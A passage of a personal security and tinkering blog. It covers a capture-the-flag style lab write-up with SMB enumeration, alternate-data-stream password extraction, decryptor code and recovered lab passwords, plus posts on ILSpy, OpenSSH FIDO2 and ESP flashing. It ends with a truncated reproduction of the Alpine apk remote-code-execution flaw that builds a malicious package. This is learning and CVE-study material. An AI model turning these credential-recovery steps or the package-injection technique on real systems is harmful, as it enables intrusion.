<span class="k">Dim</span> <span class="nv">decryptedByteCount</span> <span class="ow">As</span> <span class="kt">Integer</span>
<span class="n">decryptedByteCount</span> <span class="o">=</span> <span class="n">cryptoStream</span><span class="p">.</span><span class="n">Read</span><span class="p">(</span><span class="n">plainTextBytes</span><span class="p">,</span> <span class="n">_</span>
<span class="mi">0</span><span class="p">,</span> <span class="n">_</span>
<span class="n">plainTextBytes</span><span class="p">.</span><span class="n">Length</span><span class="p">)</span>
<span class="n">memoryStream</span><span class="p">.</span><span class="n">Close</span><span class="p">()</span>
<span class="n">cryptoStream</span><span class="p">.</span><span class="n">Close</span><span class="p">()</span>
<span class="k">Dim</span> <span class="nv">plainText</span> <span class="ow">As</span> <span class="kt">String</span>
<span class="n">plainText</span> <span class="o">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="n">GetString</span><span class="p">(</span><span class="n">plainTextBytes</span><span class="p">,</span> <span class="n">_</span>
<span class="mi">0</span><span class="p">,</span> <span class="n">_</span>
<span class="n">decryptedByteCount</span><span class="p">)</span>
<span class="k">Return</span> <span class="n">plainText</span>
<span class="k">End</span> <span class="k">Function</span>
<span class="k">Public</span> <span class="k">Sub</span> <span class="nf">Main</span><span class="p">()</span>
<span class="k">Dim</span> <span class="nv">plain</span> <span class="ow">As</span> <span class="kt">String</span>
<span class="n">plain</span> <span class="o">=</span> <span class="n">DecryptString</span><span class="p">(</span><span class="s">"fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="</span><span class="p">)</span>
<span class="nb">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="n">plain</span><span class="p">)</span>
<span class="k">End</span> <span class="k">Sub</span>
<span class="k">End</span> <span class="k">Module</span></code></pre></figure>
<p>Note that the DecryptString receive the parameter from RU_Config.xml</p>
<p>Running it on dotnetfiddle we get: “xRxRxPANCAK3SxRxRx”, therefore user c.smith must have this password. Trying to list everything with this new user:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>smbmap <span class="nt">-H</span> 10.10.10.178 <span class="nt">-R</span> <span class="nt">--depth</span> 10 <span class="nt">-p</span> xRxRxPANCAK3SxRxRx <span class="nt">-u</span> C.Smith</code></pre></figure>
<p>We will see some different files on his folder and the user flag. Download everything again.</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>smbget <span class="nt">-R</span> smb://10.10.10.178/Users/C.Smith <span class="nt">-U</span> c.smith
Password <span class="k">for</span> <span class="o">[</span>c.smith] connecting to //Users/10.10.10.178:
Using workgroup WORKGROUP, user c.smith
smb://10.10.10.178/Users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe
smb://10.10.10.178/Users/C.Smith/HQK Reporting/Debug Mode Password.txt
smb://10.10.10.178/Users/C.Smith/HQK Reporting/HQK_Config_Backup.xml
smb://10.10.10.178/Users/C.Smith/user.txt
Downloaded 17.27kB <span class="k">in </span>12 seconds</code></pre></figure>
<p>Debug mode password.txt is empty which is weird lets try to get more information about it.</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>smbclient <span class="nt">-H</span> <span class="se">\\\\</span>10.10.10.178<span class="se">\\</span>Users/ <span class="nt">-U</span> c.smith
directory_create_or_exist: <span class="nb">mkdir </span>failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP<span class="se">\c</span>.smith<span class="s1">'s password:
Try "help" to get a list of possible commands.
smb: \> cd C.Smith
dirsmb: \C.Smith\> dir
. D 0 Sun Jan 26 02:21:44 2020
.. D 0 Sun Jan 26 02:21:44 2020
HQK Reporting D 0 Thu Aug 8 19:06:17 2019
user.txt A 32 Thu Aug 8 19:05:24 2019
cd
10485247 blocks of size 4096. 6543375 blocks available
smb: \C.Smith\> cd HQK Reporting\
cd \C.Smith\HQK\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \C.Smith\> cd "HQK Reporting"
smb: \C.Smith\HQK Reporting\> dir
. D 0 Thu Aug 8 19:06:17 2019
.. D 0 Thu Aug 8 19:06:17 2019
AD Integration Module D 0 Fri Aug 9 08:18:42 2019
Debug Mode Password.txt A 0 Thu Aug 8 19:08:17 2019
HQK_Config_Backup.xml A 249 Thu Aug 8 19:09:05 2019
10485247 blocks of size 4096. 6543375 blocks available
smb: \C.Smith\HQK Reporting\> allinfo " Debug Mode Password.txt"
NT_STATUS_OBJECT_NAME_NOT_FOUND getting alt name for \C.Smith\HQK Reporting\ Debug Mode Password.txt
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time: Thu Aug 8 07:06:12 PM 2019 EDT
access_time: Thu Aug 8 07:06:12 PM 2019 EDT
write_time: Thu Aug 8 07:08:17 PM 2019 EDT
change_time: Thu Aug 8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> </span></code></pre></figure>
<p>It has another stream of data called Password. Let’s download it:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash">smb: get <span class="s2">"Debug Mode Password.txt"</span>:password
getting file <span class="se">\C</span>.Smith<span class="se">\H</span>QK Reporting<span class="se">\D</span>ebug Mode Password.txt:password of size 15 as Debug Mode Password.txt:password <span class="o">(</span>0.0 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 0.0 KiloBytes/sec<span class="o">)</span></code></pre></figure>
<p>Cat it we see: “WBQ201953D8w”</p>
<p>Dope. Another password. Let’s go back to HQK.</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is <span class="s1">'^]'</span><span class="nb">.</span>
HQK Reporting Service V1.2
<span class="o">></span>debug xRxRxPANCAK3SxRxRx
Invalid password entered
<span class="o">></span>debug WBQ201953D8w
Debug mode enabled. Use the HELP <span class="nb">command </span>to view additional commands that are now available
<span class="o">></span>session
<span class="nt">---</span> Session Information <span class="nt">---</span>
Session ID: 26ecec2e-c357-4860-8f29-d8045141cb6a
Debug: True
Started At: 6/2/2020 4:19:47 AM
Server Endpoint: 10.10.10.178:4386
Client Endpoint: 10.10.16.87:33366
Current Query Directory: C:<span class="se">\P</span>rogram Files<span class="se">\H</span>QK<span class="se">\A</span>LL QUERIES
<span class="o">></span>setdir ..
Current directory <span class="nb">set </span>to HQK
<span class="o">></span>list
Use the query ID numbers below with the RUNQUERY <span class="nb">command </span>and the directory names with the SETDIR <span class="nb">command
</span>QUERY FILES IN CURRENT DIRECTORY
<span class="o">[</span>DIR] ALL QUERIES
<span class="o">[</span>DIR] LDAP
<span class="o">[</span>DIR] Logs
<span class="o">[</span>1] HqkSvc.exe
<span class="o">[</span>2] HqkSvc.InstallState
<span class="o">[</span>3] HQK_Config.xml
Current Directory: HQK
<span class="o">></span><span class="nb">cd </span>LDAP
Unrecognised <span class="nb">command</span>
<span class="o">></span>setdir LDAP
Current directory <span class="nb">set </span>to LDAP
<span class="o">></span>list
Use the query ID numbers below with the RUNQUERY <span class="nb">command </span>and the directory names with the SETDIR <span class="nb">command
</span>QUERY FILES IN CURRENT DIRECTORY
<span class="o">[</span>1] HqkLdap.exe
<span class="o">[</span>2] Ldap.conf
Current Directory: LDAP
<span class="o">></span>showquery 2
<span class="nv">Domain</span><span class="o">=</span>nest.local
<span class="nv">Port</span><span class="o">=</span>389
<span class="nv">BaseOu</span><span class="o">=</span><span class="nv">OU</span><span class="o">=</span>WBQ Users,OU<span class="o">=</span>Production,DC<span class="o">=</span>nest,DC<span class="o">=</span><span class="nb">local
</span><span class="nv">User</span><span class="o">=</span>Administrator
<span class="nv">Password</span><span class="o">=</span>yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4<span class="o">=</span></code></pre></figure>
<p>This was a bit lucky, I had to navigate with setdir/list in debug mode to understand and find this Ldap.conf file. Once again, we have it encrypted and we found the .exe before so this might be another VB program, so maybe trying to decompile it with https://github.com/icsharpcode/AvaloniaILSpy - If you have trouble to install it check <a href="/2020/06/18/install-avalonia-ilspy.html">installing Avalonia ILSpy</a>.</p>
<p>If you decompile it with AvaloniaILSpy using the .exe as input looking on main module you will see:</p>
<figure class="highlight"><pre><code class="language-vb" data-lang="vb"> <span class="n">else</span> <span class="n">if</span> <span class="p">(</span><span class="n">text</span><span class="p">.</span><span class="n">StartsWith</span><span class="p">(</span><span class="s">"Password="</span><span class="p">,</span> <span class="n">StringComparison</span><span class="p">.</span><span class="n">CurrentCultureIgnoreCase</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">ldapSearchSettings</span><span class="p">.</span><span class="n">Password</span> <span class="o">=</span> <span class="n">CR</span><span class="p">.</span><span class="n">DS</span><span class="p">(</span><span class="n">text</span><span class="p">.</span><span class="n">Substring</span><span class="p">(</span><span class="n">text</span><span class="p">.</span><span class="n">IndexOf</span><span class="p">(</span><span class="c1">'=') + 1));</span>
<span class="p">}</span></code></pre></figure>
<p>This seems the function being used to decrypt the password CR.DS. You can check what happens on CR. Now, if we build our own version:</p>
<figure class="highlight"><pre><code class="language-vb" data-lang="vb"><span class="n">using</span> <span class="n">System</span><span class="err">;</span>
<span class="n">using</span> <span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="err">;</span>
<span class="n">using</span> <span class="n">System</span><span class="p">.</span><span class="n">Security</span><span class="p">.</span><span class="n">Cryptography</span><span class="err">;</span>
<span class="n">using</span> <span class="n">System</span><span class="p">.</span><span class="n">Text</span><span class="err">;</span>
<span class="n">public</span> <span class="n">class</span> <span class="n">CR</span>
<span class="p">{</span>
<span class="n">private</span> <span class="n">const</span> <span class="n">string</span> <span class="n">K</span> <span class="o">=</span> <span class="s">"667912"</span><span class="err">;</span>
<span class="n">private</span> <span class="n">const</span> <span class="n">string</span> <span class="n">I</span> <span class="o">=</span> <span class="s">"1L1SA61493DRV53Z"</span><span class="err">;</span>
<span class="n">private</span> <span class="n">const</span> <span class="n">string</span> <span class="n">SA</span> <span class="o">=</span> <span class="s">"1313Rf99"</span><span class="err">;</span>
<span class="n">public</span> <span class="n">static</span> <span class="n">string</span> <span class="n">DS</span><span class="p">(</span><span class="n">string</span> <span class="n">EncryptedString</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">if</span> <span class="p">(</span><span class="n">string</span><span class="p">.</span><span class="n">IsNullOrEmpty</span><span class="p">(</span><span class="n">EncryptedString</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">return</span> <span class="n">string</span><span class="p">.</span><span class="n">Empty</span><span class="err">;</span>
<span class="p">}</span>
<span class="n">return</span> <span class="n">RD</span><span class="p">(</span><span class="n">EncryptedString</span><span class="p">,</span> <span class="s">"667912"</span><span class="p">,</span> <span class="s">"1313Rf99"</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="s">"1L1SA61493DRV53Z"</span><span class="p">,</span> <span class="mi">256</span><span class="p">)</span><span class="err">;</span>
<span class="p">}</span>
<span class="n">private</span> <span class="n">static</span> <span class="n">string</span> <span class="n">RD</span><span class="p">(</span><span class="n">string</span> <span class="n">cipherText</span><span class="p">,</span> <span class="n">string</span> <span class="n">passPhrase</span><span class="p">,</span> <span class="n">string</span> <span class="n">saltValue</span><span class="p">,</span> <span class="n">int</span> <span class="n">passwordIterations</span><span class="p">,</span> <span class="n">string</span> <span class="n">initVector</span><span class="p">,</span> <span class="n">int</span> <span class="n">keySize</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">byte</span><span class="err">[]</span> <span class="n">bytes</span> <span class="o">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="n">initVector</span><span class="p">)</span><span class="err">;</span>
<span class="n">byte</span><span class="err">[]</span> <span class="n">bytes2</span> <span class="o">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="n">saltValue</span><span class="p">)</span><span class="err">;</span>
<span class="n">byte</span><span class="err">[]</span> <span class="n">array</span> <span class="o">=</span> <span class="n">Convert</span><span class="p">.</span><span class="n">FromBase64String</span><span class="p">(</span><span class="n">cipherText</span><span class="p">)</span><span class="err">;</span>
<span class="n">Rfc2898DeriveBytes</span> <span class="n">rfc2898DeriveBytes</span> <span class="o">=</span> <span class="n">new</span> <span class="n">Rfc2898DeriveBytes</span><span class="p">(</span><span class="n">passPhrase</span><span class="p">,</span> <span class="n">bytes2</span><span class="p">,</span> <span class="n">passwordIterations</span><span class="p">)</span><span class="err">;</span>
<span class="n">checked</span>
<span class="p">{</span>
<span class="n">byte</span><span class="err">[]</span> <span class="n">bytes3</span> <span class="o">=</span> <span class="n">rfc2898DeriveBytes</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">((</span><span class="n">int</span><span class="p">)</span><span class="n">Math</span><span class="p">.</span><span class="n">Round</span><span class="p">((</span><span class="n">double</span><span class="p">)</span><span class="n">keySize</span> <span class="o">/</span> <span class="mf">8.0</span><span class="p">))</span><span class="err">;</span>
<span class="n">AesCryptoServiceProvider</span> <span class="n">aesCryptoServiceProvider</span> <span class="o">=</span> <span class="n">new</span> <span class="n">AesCryptoServiceProvider</span><span class="p">()</span><span class="err">;</span>
<span class="n">aesCryptoServiceProvider</span><span class="p">.</span><span class="n">Mode</span> <span class="o">=</span> <span class="n">CipherMode</span><span class="p">.</span><span class="n">CBC</span><span class="err">;</span>
<span class="n">ICryptoTransform</span> <span class="n">transform</span> <span class="o">=</span> <span class="n">aesCryptoServiceProvider</span><span class="p">.</span><span class="n">CreateDecryptor</span><span class="p">(</span><span class="n">bytes3</span><span class="p">,</span> <span class="n">bytes</span><span class="p">)</span><span class="err">;</span>
<span class="n">MemoryStream</span> <span class="n">memoryStream</span> <span class="o">=</span> <span class="n">new</span> <span class="n">MemoryStream</span><span class="p">(</span><span class="n">array</span><span class="p">)</span><span class="err">;</span>
<span class="n">CryptoStream</span> <span class="n">cryptoStream</span> <span class="o">=</span> <span class="n">new</span> <span class="n">CryptoStream</span><span class="p">(</span><span class="n">memoryStream</span><span class="p">,</span> <span class="n">transform</span><span class="p">,</span> <span class="n">CryptoStreamMode</span><span class="p">.</span><span class="n">Read</span><span class="p">)</span><span class="err">;</span>
<span class="n">byte</span><span class="err">[]</span> <span class="n">array2</span> <span class="o">=</span> <span class="n">new</span> <span class="n">byte</span><span class="err">[</span><span class="n">array</span><span class="p">.</span><span class="n">Length</span> <span class="o">+</span> <span class="mi">1</span><span class="err">];</span>
<span class="n">int</span> <span class="n">count</span> <span class="o">=</span> <span class="n">cryptoStream</span><span class="p">.</span><span class="n">Read</span><span class="p">(</span><span class="n">array2</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">array2</span><span class="p">.</span><span class="n">Length</span><span class="p">)</span><span class="err">;</span>
<span class="n">memoryStream</span><span class="p">.</span><span class="n">Close</span><span class="p">()</span><span class="err">;</span>
<span class="n">cryptoStream</span><span class="p">.</span><span class="n">Close</span><span class="p">()</span><span class="err">;</span>
<span class="n">return</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="n">GetString</span><span class="p">(</span><span class="n">array2</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">count</span><span class="p">)</span><span class="err">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">public</span> <span class="n">class</span> <span class="n">Program</span>
<span class="p">{</span>
<span class="n">public</span> <span class="n">static</span> <span class="n">void</span> <span class="n">Main</span><span class="p">()</span>
<span class="p">{</span>
<span class="nb">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="n">CR</span><span class="p">.</span><span class="n">DS</span><span class="p">(</span><span class="s">"yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="</span><span class="p">))</span><span class="err">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>The output of it is: XtH4nkS4Pl4y1nGX (We have used dotnetfiddle for this again).</p>
<p>Getting the Administrator files and navigating there we can find the root flag.</p>
Installing AvaloniaILSpy on Kali Linux2020-06-18T00:00:00-05:00http://www.matbra.com/2020/06/18/install-avalonia-ilspy<p>Hello,</p>
<p>I have been studying pentest and eventually I had to decompile some VB NET (.NET) and decided to give a try on AvaloniaILSpy.</p>
<p>If you ever need to install it on Kali linux 20 you can install its dependencies with:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nb">sudo </span>apt-get update
<span class="nb">sudo </span>apt-get upgrade
wget https://packages.microsoft.com/config/ubuntu/19.10/packages-microsoft-prod.deb <span class="nt">-O</span> packages-microsoft-prod.deb
<span class="nb">sudo </span>dpkg <span class="nt">-i</span> packages-microsoft-prod.deb
<span class="nb">sudo </span>apt-get update
<span class="nb">sudo </span>apt-get <span class="nb">install </span>apt-transport-https
<span class="nb">sudo </span>apt-get update
<span class="nb">sudo </span>apt-get <span class="nb">install </span>dotnet-sdk-3.1
<span class="nb">sudo </span>apt-get <span class="nb">install </span>mono-devel
git clone https://github.com/icsharpcode/AvaloniaILSpy.git
<span class="nb">cd </span>AvaloniaILSpy/
git submodule update <span class="nt">--init</span> <span class="nt">--recursive</span></code></pre></figure>
<p>And later to build and run it:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>bash build.sh
<span class="nv">$ </span><span class="nb">cd </span>artifacts/linux-x64/
<span class="nv">$ </span>./ILSpy</code></pre></figure>
<p>Hope this helps you,
Matheus</p>
Building OpenSSH 8.2 and using FIDO2 U2F on ssh authentication2020-02-17T00:00:00-06:00http://www.matbra.com/2020/02/17/using-fido2-with-ssh<p>OpenSSH 8.2 was just released with support for FIDO2 U2F keys. This is a nice extra layer for security!</p>
<p>As this is not yet on official repository for Fedora, we will need to build openssh 8.2 if we want to test.</p>
<p>OpenSSH 8.2 needs libfido2 and libfido2 needs libcbor systemd-devel. There is no package for FIDO2 on Fedora 31 yet, therefore we also need to build it.</p>
<p>Let’s start installing some dependencies:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo dnf group install 'Development Tools'
$ sudo dnf install libselinux-devel libselinux libcbor libcbor-devel systemd-devel cmake
</code></pre></div></div>
<p>To install libfido:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git clone git@github.com:Yubico/libfido2.git
$ cd libfido2
$ (rm -rf build && mkdir build && cd build && cmake ..)
$ make -C build
$ sudo make -C build install
</code></pre></div></div>
<p>Here we are cloning the code and basically using their commands to install it.</p>
<p>With this dependency ready let’s get openssh-8.2:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ mkdir openssl-8
$ cd openssl-8
$ mkdir test-openssh
$ wget http://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-8.2p1.tar.gz
$ tar xvzf openssh-8.2p1.tar.gz
$ cd openssh-8.2p1
</code></pre></div></div>
<p>With the code in place we will use configure to prepare it:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ./configure --with-security-key-builtin --with-md5-passwords --with-selinux --with-privsep-path=$HOME/openssl-8/test-openssh --sysconfdir=$HOME/openssl-8/test-openssh --prefix=$HOME/openssl-8/test-openssh
</code></pre></div></div>
<p>Note: <code class="highlighter-rouge">--with-security-key-builtin</code> is important to have support for FIDO2 internally. This command will prepare the path as <code class="highlighter-rouge">$HOME/openssl-8/test-openssh</code> my idea here is to avoid messing with my existing ssh.</p>
<p>After this is completed we can make/make install</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ make
$ make install
</code></pre></div></div>
<p>I also had to create a udev rule:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/udev/rules.d/90-fido.rules
</code></pre></div></div>
<p>With this content:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>KERNEL=="hidraw*", SUBSYSTEM=="hidraw", \
MODE="0664", GROUP="plugdev", ATTRS{idVendor}=="1050"
</code></pre></div></div>
<p>After all this I entered on the binary folder</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cd $HOME/openssl-8/test-openssh/bin
</code></pre></div></div>
<p>To run the binary we must use <code class="highlighter-rouge">./</code> otherwise it will use the other binary which are system wide and we want to run the exact one which we just build. I’m not exactly sure why, but when I was running ssh-keygen, I was having some issues to find the libfido2.so.2</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ./ssh-keygen -t ecdsa-sk -f /tmp/test_ecdsa_sk
Generating public/private ecdsa-sk key pair.
You may need to touch your authenticator to authorize key generation.
/home/matheus/openssl-8/test-openssh/libexec/ssh-sk-helper: error while loading shared libraries: libfido2.so.2: cannot open shared object file: No such file or directory
ssh_msg_recv: read header: Connection reset by peer
client_converse: receive: unexpected internal error
reap_helper: helper exited with non-zero exit status
Key enrollment failed: unexpected internal error
</code></pre></div></div>
<p>In my case I found the location of this file and copied it to “/usr/lib64/libfido2.so.2”</p>
<p>After this when running the command to generate it without the fido2 plugged in I got:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ./ssh-keygen -t ecdsa-sk -f /tmp/test_ecdsa_sk
Generating public/private ecdsa-sk key pair.
You may need to touch your authenticator to authorize key generation.
Key enrollment failed: device not found
</code></pre></div></div>
<p>Plugin the key in and trying again</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ./ssh-keygen -t ecdsa-sk -f /tmp/test_ecdsa_sk
Generating public/private ecdsa-sk key pair.
You may need to touch your authenticator to authorize key generation.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in -f /tmp/test_ecdsa_sk
Your public key has been saved in -f /tmp/test_ecdsa_sk.pub
The key fingerprint is:
SHA256:.../... host@boom
</code></pre></div></div>
<p>The key was generated succesfully!!</p>
<p>Now, I needed a server which supports this. Therefore I created a dockerfile from ubuntu:20.04 with an sshd running and openssh 8.2</p>
<p>I’m using ubuntu:20.04 as it has libfido2 on apt and libcbor too.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FROM ubuntu:20.04
RUN apt-get update && apt-get -y install software-properties-common build-essential zlib1g-dev libssl-dev libcbor-dev wget
RUN apt-add-repository -y ppa:yubico/stable && apt-get update && apt-get -y install libfido2-dev
RUN apt-get -y install ssh && apt-get -y remove ssh
RUN wget http://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-8.2p1.tar.gz
RUN tar xvzf openssh-8.2p1.tar.gz
RUN cd openssh-8.2p1 && ./configure --with-security-key-builtin --with-md5-passwords && make && make install
EXPOSE 22
CMD ["/usr/local/sbin/sshd", "-D"]
</code></pre></div></div>
<p>To build and run this:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ docker build -t ubuntussh .
$ docker run -p 2222:22 -v /tmp/test_ecdsa_sk.pub:/root/.ssh/authorized_keys -it ubuntussh bash
</code></pre></div></div>
<p>Now you will be inside the docker instance and I had to chown the authorized key file and run the sshd:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ chown -R root:root ~/.ssh/
$ /usr/local/sbin/sshd
</code></pre></div></div>
<p>Open a new terminal and cd into the openssl 8 bin folder again.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SSH_AUTH_SOCK= ./ssh -o "PasswordAuthentication=no" -o "IdentitiesOnly=yes" -i /tmp/test_ecdsa_sk root@localhost -p 2222
</code></pre></div></div>
<p>The <code class="highlighter-rouge">SSH_AUTH_SOCK</code> is to avoid using the ssh-agent which is already running, -i to specify exactly the key I want to use.</p>
<p>This outputs:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Enter passphrase for key '/tmp/test_ecdsa_sk':
Confirm user presence for key ECDSA-SK SHA256:bsIjeSdrNiB4FhxfYBoHH2sCXLiISu9sxDFNrFLgBwY
</code></pre></div></div>
<p>Now we are in the ubuntussh with FIDO2+password!</p>
<p>Hope this helps you,
Matheus</p>
<p>Reference:
<a href="https://bugs.archlinux.org/task/65513">https://bugs.archlinux.org/task/65513</a>
<a href="https://github.com/Yubico/libfido2">https://github.com/Yubico/libfido2</a>
<a href="https://www.openssh.com/txt/release-8.2">https://www.openssh.com/txt/release-8.2</a>
<a href="http://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/">http://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/</a></p>
Use a remote serial port to flash an esp2020-02-05T00:00:00-06:00http://www.matbra.com/2020/02/05/use-remote-serial-port-to-flash-esp<p>Recently I got back to playing with some ESP8266 as I decided to make my home smarter. Taking a look on my boards I noticed I didn’t have any 3.3V board to flash it. Taking a closer look I found I had a raspberry pi around, so I could simply use it.</p>
<p>After doing the setup and being able to flash using the raspberry pi it felt too hard to be programming on it and using vnc or something like this. Therefore I decided to try to use a remote serial port.</p>
<p>At first I got to socat but I couldn’t get it to work as it seems it doesn’t forward some specific signals. After some googling I found ser2net which seems to be compliant with RFC2217.</p>
<p>To install ser2net on my raspberry pi I used:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt-get install ser2net
</code></pre></div></div>
<p>After this to create a tunnel and expose it on my machine I used:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ssh -L 8086:localhost:8086 pi@PI_ADDRESS '/usr/sbin/ser2net -d -C "8086:raw:600:/dev/ttyAMA0:115200"'
</code></pre></div></div>
<p>Basically I’m forwarding my local port 8086 and on the remote device on 8086, being raw with permission 600 with port /dev/ttyAMA0 and baudrate of 115200.</p>
<p>To be able to flash my ESP8266 I used:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ esptool.py -p socket://localhost:8086 write_flash -fm dio 0x000000 BasicOTA.ino.generic.bin
</code></pre></div></div>
<p>Note the -p socket:// with this it will use the socket to communicate.</p>
<p>I hope this will be helpful for you.
Matheus</p>
Testing RCE on Alpine Linux via APK2018-09-14T00:00:00-05:00http://www.matbra.com/2018/09/14/Testing-RCE-on-alpine-linux-via-apk<p>I have been studying a little bit of security and one of the things I’m doing from time to time is reading CVE and trying to test and understand what is happening. Yesterday <a href="https://justi.cz/">Max Justicz</a> published <a href="https://justi.cz/security/2018/09/13/alpine-apk-rce.html">Remote Code Execution in Alpine Linux</a>. He found an issues on <code class="highlighter-rouge">apk</code> which is the package manager for Alpine Linux which is super popular on docker images.</p>
<p>Max did a great job explaining the steps and the reasoning, but I wanted to try it myself.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>- Create a folder at /etc/apk/commit_hooks.d/, which doesn’t exist by default. Extracted folders are not suffixed with .apk-new.
- Create a symlink to /etc/apk/commit_hooks.d/x named anything – say, link. This gets expanded to be called link.apk-new but still points to /etc/apk/commit_hooks.d/x.
- Create a regular file named link (which will also be expanded to link.apk-new). This will write through the symlink and create a file at /etc/apk/commit_hooks.d/x.
- When apk realizes that the package’s hash doesn’t match the signed index, it will first unlink link.apk-new – but /etc/apk/commit_hooks.d/x will persist! It will then fail to unlink /etc/apk/commit_hooks.d/ with ENOTEMPTY because the directory now contains our payload.
</code></pre></div></div>
<p>The instructions seem simple but if you are not super familiar with how a tar file works, you may not understand it. On a tar file you can have multiple versions/files with the same name and you can extract one of them using <code class="highlighter-rouge">--occurrence</code> option. With this in mind, the instructions make a little bit more sense, so shall we try to create this file?</p>
<p>First of all, let’s create the directories:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo mkdir /etc/apk/commit_hooks.d/
mkdir folder_for_link
mkdir folder_for_real_file
</code></pre></div></div>
<p>Create the link:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/etc/apk/commit_hooks.d/x folder_for_link/magic
</code></pre></div></div>
<p>Create the real file on <code class="highlighter-rouge">folder_for_real_file/magic</code> with this content:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/sh</span>
<span class="nb">echo</span> <span class="s2">"something"</span> <span class="o">></span> /tmp/test-12346-YAY
<span class="nb">echo</span> <span class="s2">"ha"</span> <span class="o">></span> /testfileroot
</code></pre></div></div>
<p>(If it really works we should have a /tmp/test-123456-YAY file and one /testfileroot too)</p>
<p>Cool, now it seems we have almost everything we need! Let’s create the apk with:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tar -zcvf bad-intention.apk /etc/apk/commit_hooks.d/ -C $PWD/folder_for_link/ magic -C $PWD/folder_for_real_file/ magic
</code></pre></div></div>
<p>Here we are adding all this 3 things in sequence to the tar file, you can check tar content with <code class="highlighter-rouge">t</code> option:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ tar tvf bad-intention.apk
drwxr-xr-x root/root 0 2018-09-13 19:44 etc/apk/commit_hooks.d/
lrwxrwxrwx root/root 0 2018-09-13 19:37 magic -> /etc/apk/commit_hooks.d/x
-rwxrwxrwx root/root 954 2018-09-13 23:24 magic
</code></pre></div></div>
<p>(Pay attention on the order of this files: create directory commit_hooks.d, creation of link and creation of file)</p>
<p>What should be the behavior now? Since apk on alpine runs from <code class="highlighter-rouge">/</code> it will create the folder <code class="highlighter-rouge">/etc/apk/commit_hooks.k</code>, later it will extract the
